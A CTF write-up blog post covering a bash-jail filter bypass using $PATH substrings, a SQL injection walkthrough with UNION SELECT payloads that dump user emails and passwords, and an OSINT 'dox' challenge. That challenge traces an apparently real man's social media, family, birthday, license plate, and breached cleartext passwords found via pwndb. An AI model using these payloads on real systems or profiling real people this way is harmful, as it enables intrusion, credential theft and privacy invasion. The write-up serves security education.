Posts Union CTF Writeup
Post
Cancel

Union CTF Writeup

Feb 21, 2021 2021-02-21T11:00:00-08:00 on CTF, writeup

Union CTF is a jeopardy-style CTF aiming for a medium difficulty, organised by the UK-based cr0wn team.

The first writeups are a web/sh jail, then the rest is the big OSINT question from this CTF. Several details have been left our or are intentionally vague as the challenge was to literally dox someone.

bashlex (Misc)

This challenge comes with source code, but I didn’t notice/did not need it to solve the challenge. We are placed in a SH jail with a few whitelisted commands and blacklisted words.

We are given access to ls, so I was able to determine that the flag was in /home/bashlex/flag.txt.

Now we just need to print the flag. When it comes to bash jails, people always overlook base64, and it was overlooked again here. I try to base64 encode the flag, but I cannot type the word flag.

To get around this, I tried using wildcards (?, *) but those were restricted. However, I could use environmenet variables with no restriction. There is an A at Index 8 in $PATH, so I was able to use that to print the base64 encoded flag.

1
2

base64 /home/bashlex/fl${PATH:8:1}g.txt
dW5pb257Y2hvbXNreV9nb19sbGxsbGxsbGwxfQo=

And we get the flag: union{chomsky_go_lllllllll1}

Meet the Union Committee (Web)

The profiles on this site are vulnerable to SQL injection.

1

http://34.105.202.19:1336/?id=2

Replacing with a single quote yeilds this:

1
2
3
4

Traceback (most recent call last):
  File "unionflaggenerator.py", line 49, in do_GET
    cursor.execute("SELECT id, name, email FROM users WHERE id=" + params["id"])
sqlite3.OperationalError: unrecognized token: "`"

So now we can easy go throuhg the database.

We know there are 3 columns based on the leaked query, so we can go straight to:

1

2 UNION SELECT null, 'a', null

Let’s get table names:

1
2
3
4
5

2 UNION SELECT null, name, null FROM sqlite_master WHERE type ='table'

comments
sqlite_sequence
users

Let’s get the columns from the users table:

1
2
3

2 UNION SELECT null, sql, null FROM sqlite_master WHERE tbl_name = 'users' AND type = 'table'

email, password, id

Now let’s grab the email/password combos for everyone:

1

?id=2 UNION SELECT null,email || '~' || password, null FROM users

And we get the flag: union{uni0n_4ll_s3l3ct_n0t_4_n00b}

Name (1)

1
2
3
4
5
6
7

Brian S from Newport left Crown in 2014 to become regional sales manager. He was really great at pwn but wanted to pursue his childhood goal of making as much money as possible.

What is Brian's Last name?

Please note this does not require the flag format.

Author: BananaMan

Ok, we get a little bit of information about someone and we have to track them down on the internet. The things I noted here are:

1) Crown is not spelled as cr0wn, meaning it is something different. I googled companies with the name Crown and there were so many results that I decided to ignore this bit of information initially.

2) His job title is Regional Sales Manager.

3) The fact that he wants to “make as much money as possible.

4) He is from Newport.

Given that this information is tied to someone’s professional life, I decided to use this information to search for Brian on LinkedIn.

To find Brian, I utilized LinkedIn’s filters.

I did a search for Brian and used the keyword title filter Regional Sales Manager Additionally, for the location filter, I tried every Newport that I could. For Newport Beach, CA:

linkedin1

linkedin2

And we find this LinkedIn Profile!

Last Name: Schuler.

Brian’s CV

On his LinkedIn profile, he includes his CV which has answers for the following problems:

1
2
3
4
5
6

Email (1)
Address (1)
Address (2)
Address (3)
Number (1)
Number (2)

Sports

In the “interests” section on LinkedIn, we can see the Angels:

linkedin3

Name(2), Business

After thourougly going through his LinkedIn profile, I could not find this information so I decided to look for different social media accounts.

I ended up finding his facebook account using the information from LinkedIn.

Here, we can see in his friends list that his wife’s name is Denise and that he currently a Small Business Owner at Ohana Hui.

Dates(1)

1

What day and month is Brian's Birthday?

From his facebook account:

birthday

Transportation

1

What is the license plate number of Brian's car?

I could not find this information from his Facebook account, so I decided to look for another social media account.

I ended up finding his instagram account, using his daughter’s username.

I found a post from July 21, 2017 containing his license plate.

Date (2)

1

What date did Brian and his wife marry on?

Going through his instagram posts, I see an image where he and his wife are at a “Hitching Post”. It was posted on Feb 22, 2015 and the caption says that “23 years and 77 days ago his wife said yes”. Using this, I was able to find his wedding date.

Password (1), Password (2)

For these challenges, I utilized pwndb. Using the emails learned from previous challenges, I searched the db and found his passwords in cleartext.

Email (3)

1

Can you find another organisational email address for Brian?

Looking at his CV back from LinkedIn, I went through where he had worked, looked up the email format for that company, and tried to enter it as the flag.

For the Independent Can company, I found their emails are usually set up like this:

1

<first><last_initial>@independentcan.com

So: brians@independentcan.com.

writeup web osint
This post is licensed under CC BY 4.0

Portswigger Academy Notes: SQL Injection (SQLi)

Portswigger Academy Notes: Path Traversal